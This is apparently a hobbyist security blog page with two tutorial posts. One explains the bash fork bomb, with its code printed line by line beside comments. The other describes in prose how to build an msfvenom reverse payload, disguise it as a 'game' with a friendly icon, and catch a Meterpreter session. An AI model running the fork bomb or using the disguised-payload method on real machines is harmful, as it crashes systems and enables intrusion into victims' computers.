Posts

Showing posts from August, 2021

Rabbit Virus

Image
A fork bomb (also called rabbit virus or wabbit) is a denial-of-service attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation . Understanding   the   above: :() # define ':' -- whenever we say ':', do this: { # beginning of what to do when we say ':' : # load another copy of the ':' function into memory... | # ...and pipe its output to... : # ...another copy of ':' function, which has to be loaded into memory # (therefore, ':|:' simply gets two copies of ':' loaded whenever ':' is called) & # disown the functions -- if the first ':' is killed, # all of the functions that it has started should NOT be auto-killed } # end of what to do when we say ':' ; # Having defined ':', we should now... : # ...call ':'

Msfvenom

Image
 Creating payload using msfvenom on Kali Linux  Creation of payload is Successful Starting the Apache services to facilitate listening for the incoming connection, which will be created by the payload. Using Metasploit handler to grab incoming connection. Setting handler payload type. Setting the host IP address that the payload will try to connect to. Setting the host port number that the payload will try to connect on. Starting the handler to await any connection attempts from our crafted payload. It will keep listening until a connection is established Target machine POV; By default our crafted payload that we name game will look like this. We can also change its icon make it look more friendly. Once target execute the payload, our Metasploit handler will grab it and complete the connection. And a Meterpreter session will open. Now you can safely say: "We're In ;)"